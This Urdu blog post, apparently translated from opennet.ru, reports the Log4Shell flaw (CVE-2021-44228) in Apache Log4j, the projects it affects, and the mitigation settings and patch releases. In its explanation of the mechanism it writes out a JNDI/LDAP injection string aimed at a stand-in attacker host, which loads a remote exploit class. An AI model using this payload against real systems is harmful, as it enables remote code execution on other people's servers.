پرو ہوسٹر > بلاگ > انٹرنیٹ کی خبریں > Apache Log4j میں تباہ کن کمزوری جاوا کے بہت سے پروجیکٹوں کو متاثر کرتی ہے۔

Apache Log4j میں تباہ کن کمزوری جاوا کے بہت سے پروجیکٹوں کو متاثر کرتی ہے۔

Apache Log4j میں، جاوا ایپلی کیشنز میں لاگنگ کو منظم کرنے کے لیے ایک مقبول فریم ورک، ایک اہم کمزوری کی نشاندہی کی گئی ہے جو لاگ پر "{jndi:URL}" فارمیٹ میں خصوصی طور پر فارمیٹ شدہ قدر لکھے جانے پر صوابدیدی کوڈ کو عمل میں لانے کی اجازت دیتا ہے۔ یہ حملہ جاوا ایپلی کیشنز پر کیا جا سکتا ہے جو بیرونی ذرائع سے موصول ہونے والی اقدار کو لاگ ان کرتی ہیں، مثال کے طور پر، غلطی کے پیغامات میں پریشانی والی اقدار کو ظاہر کرتے وقت۔

واضح رہے کہ اپاچی سٹرٹس، اپاچی سولر، اپاچی ڈروڈ یا اپاچی فلنک جیسے فریم ورک استعمال کرنے والے تقریباً تمام پروجیکٹس اس مسئلے سے متاثر ہیں، بشمول Steam، Apple iCloud، Minecraft کلائنٹس اور سرورز۔ یہ توقع کی جاتی ہے کہ کمزوری کارپوریٹ ایپلی کیشنز پر بڑے حملوں کی ایک لہر کا باعث بن سکتی ہے، جو اپاچی سٹرٹس فریم ورک میں اہم خطرات کی تاریخ کو دہراتی ہے، جو کہ ایک موٹے اندازے کے مطابق، ویب ایپلی کیشنز میں فارچیون کا 65 فیصد استعمال ہوتا ہے۔ 100 کمپنیاں جن میں کمزور سسٹمز کے لیے نیٹ ورک کو اسکین کرنے کی کوششیں شامل ہیں۔

مسئلہ اس حقیقت سے بڑھ گیا ہے کہ ایک کام کرنے والا استحصال پہلے ہی شائع کیا جا چکا ہے، لیکن مستحکم شاخوں کے لیے اصلاحات ابھی تک مرتب نہیں کی گئیں۔ CVE شناخت کنندہ کو ابھی تک تفویض نہیں کیا گیا ہے۔ درستگی صرف log4j-2.15.0-rc1 ٹیسٹ برانچ میں شامل ہے۔ خطرے کو روکنے کے لیے ایک حل کے طور پر، log4j2.formatMsgNoLookups پیرامیٹر کو درست پر سیٹ کرنے کی سفارش کی جاتی ہے۔

مسئلہ اس حقیقت کی وجہ سے پیدا ہوا کہ log4j لاگ میں لائن آؤٹ پٹ میں خصوصی ماسک "{}" کی پروسیسنگ کی حمایت کرتا ہے، جس میں JNDI (جاوا نامنگ اور ڈائریکٹری انٹرفیس) کے سوالات کو انجام دیا جا سکتا ہے۔ حملہ "${jndi:ldap://attacker.com/a}" کے متبادل کے ساتھ سٹرنگ کو منتقل کرنے پر ابلتا ہے، جس پر کارروائی کرنے پر log4j حملہ آور ڈاٹ کام سرور کو جاوا کلاس کے راستے کے لیے LDAP کی درخواست بھیجے گا۔ . حملہ آور کے سرور کے ذریعے واپس آنے والا راستہ (مثال کے طور پر، http://second-stage.attacker.com/Exploit.class) کو موجودہ عمل کے تناظر میں لوڈ اور عمل میں لایا جائے گا، جو حملہ آور کو صوابدیدی کوڈ پر عمل درآمد کرنے کی اجازت دیتا ہے۔ موجودہ درخواست کے حقوق کے ساتھ نظام۔

ضمیمہ 1: خطرے کو شناخت کنندہ CVE-2021-44228 تفویض کیا گیا ہے۔

ضمیمہ 2: ریلیز log4j-2.15.0-rc1 کے ذریعے شامل کردہ تحفظ کو نظرانداز کرنے کے طریقے کی نشاندہی کی گئی ہے۔ ایک نئی اپ ڈیٹ، log4j-2.15.0-rc2، تجویز کی گئی ہے جس میں خطرے کے خلاف مزید مکمل تحفظ ہے۔ کوڈ غلط طریقے سے فارمیٹ شدہ JNDI یو آر ایل کے استعمال کی صورت میں غیر معمولی برطرفی کی عدم موجودگی سے منسلک تبدیلی کو نمایاں کرتا ہے۔

ماخذ: opennet.ru

نیا تبصرہ شامل کریں